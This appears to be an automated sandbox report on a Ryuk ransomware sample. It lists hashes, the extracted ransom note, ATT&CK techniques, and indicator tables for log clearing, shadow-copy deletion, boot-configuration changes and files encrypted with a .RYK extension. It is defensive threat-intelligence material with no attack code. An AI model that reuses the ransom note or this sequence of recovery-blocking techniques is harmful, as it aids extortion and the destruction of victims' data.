ryuk | f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea

Analysis

max time kernel
149s
max time network
41s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
18-12-2022 18:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
Size

885KB
MD5

154b73d0a7aa19df12364a78b235f29f
SHA1

5e39ad8cd8f05d29b7587a876c318be5c0511dcc
SHA256

f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea
SHA512

bf32fb8e846170bb5f2c9505e5577e5d3b31f3f9a43030b5f3268d66f3d11f3c983b231742f0d51488c4a288639c0d9e91a911fec0b016d54047e582695a98e0
SSDEEP

12288:D/2O9w8wycU2JlJYqWYgeWYg955/155/0QebUlAAsjsKqgo7Rn6X:DbC8tUlqgQKUKRjsKqgQN6

Score

10^/10

ryuk discovery evasion ransomware

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note

Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at [email protected] or [email protected] You will receive btc address for payment in the reply letter Ryuk No system is safe

Emails

[email protected]

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Indicator Removal on Host

T1070

pid	Process
1956	wevtutil.exe
1728	wevtutil.exe
1312	wevtutil.exe
1704	wevtutil.exe
1816	wevtutil.exe
1728	wevtutil.exe
1428	wevtutil.exe
1792	wevtutil.exe
1996	wevtutil.exe
432	wevtutil.exe
820	wevtutil.exe
212	wevtutil.exe
1168	wevtutil.exe
1204	wevtutil.exe
1516	wevtutil.exe
360	wevtutil.exe
1348	wevtutil.exe
1868	wevtutil.exe
1880	wevtutil.exe
1804	wevtutil.exe
236	wevtutil.exe
324	wevtutil.exe
1540	wevtutil.exe
1712	wevtutil.exe
1776	wevtutil.exe
216	wevtutil.exe
1016	wevtutil.exe
1664	wevtutil.exe
1428	wevtutil.exe
1348	wevtutil.exe
1788	wevtutil.exe
1728	wevtutil.exe
728	wevtutil.exe
1088	wevtutil.exe
812	wevtutil.exe
952	wevtutil.exe
1764	wevtutil.exe
728	wevtutil.exe
232	wevtutil.exe
1956	wevtutil.exe
1144	wevtutil.exe
764	wevtutil.exe
1996	wevtutil.exe
780	wevtutil.exe
216	wevtutil.exe
728	wevtutil.exe
952	wevtutil.exe
1144	wevtutil.exe
900	wevtutil.exe
568	wevtutil.exe
1240	wevtutil.exe
1136	wevtutil.exe
1792	wevtutil.exe
1696	wevtutil.exe
1144	wevtutil.exe
1364	wevtutil.exe
820	wevtutil.exe
812	wevtutil.exe
1708	wevtutil.exe
1428	wevtutil.exe
1588	wevtutil.exe
728	wevtutil.exe
324	wevtutil.exe
1876	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
560	bcdedit.exe
1992	bcdedit.exe

Deletes backup catalog 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command-Line Interface

T1059

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
568	wbadmin.exe

Disables Task Manager via registry modification
evasion
Disables taskbar notifications via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	attrib.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1480	icacls.exe

Enumerates connected drives 3 TTPs 42 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\E:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\H:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\W:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\F:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\I:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\M:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\N:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\A:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\K:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\R:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\S:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\U:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\V:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\X:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\L:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\B:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\T:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\J:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\O:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\P:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\Y:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\G:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\Q:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\Z:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.metadataprovider.exsd.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_mid.gif.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Sydney.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyDrop32x32.gif.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0234001.WMF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\BORDERS\MSART1.BDR.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Module.zip.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\7-Zip\Lang\de.txt.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.properties.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\smtp.jar.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Ashgabat.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\MET.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Tijuana.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS01639_.WMF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\BG_ADOBE.GIF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Montevideo.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\MSPUB_F_COL.HXK.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR19F.GIF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignleft.gif.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ar.txt.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Santiago.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\CollectSignatures_Sign.xsn.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0293240.WMF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.ja_5.5.0.165303.jar.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL095.XML.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSSP7EN.LEX.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\StaticText.jpg.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Honolulu.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01170_.WMF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14656_.GIF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH_COL.HXC.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Newsprint.xml.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_pressed.gif.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBBA\MSPUB2A.BDR.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\bin\startNetworkServer.bat.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.RSA.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-outline.jar.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02441_.WMF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02448_.WMF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OOFTMPL.CFG.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\LISTS\1033\STOCKS.XML.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\PAPYRUS\PAPYRUS.INF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107316.WMF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02439_.WMF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\default.jfc.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Rangoon.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\TextConv\WPFT632.CNV.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0153307.WMF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives_1.1.100.v20140523-0116.jar.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01630_.WMF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21335_.GIF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Maroon.css.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Places\LASER.WAV.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD10290_.GIF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.properties.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00117_.WMF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Newsprint.eftx.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0214934.WMF.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\DLGSETP.DLL.[[email protected]].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	C:\Windows\hrmlog1	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wbadmin.exe
File created	C:\Windows\RyukReadMe.txt	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
728	sc.exe
360	sc.exe
432	sc.exe
324	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1820	schtasks.exe
904	schtasks.exe
1088	schtasks.exe
1816	schtasks.exe
952	schtasks.exe

Interacts with shadow copies 2 TTPs 15 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1880	vssadmin.exe
1780	vssadmin.exe
232	vssadmin.exe
904	vssadmin.exe
1784	vssadmin.exe
1076	vssadmin.exe
1588	vssadmin.exe
1608	vssadmin.exe
1796	vssadmin.exe
1984	vssadmin.exe
792	vssadmin.exe
108	vssadmin.exe
572	vssadmin.exe
1396	vssadmin.exe
1088	vssadmin.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
1172	taskkill.exe
1348	taskkill.exe
812	taskkill.exe
1364	taskkill.exe
1164	taskkill.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1740	NOTEPAD.EXE

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1192	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
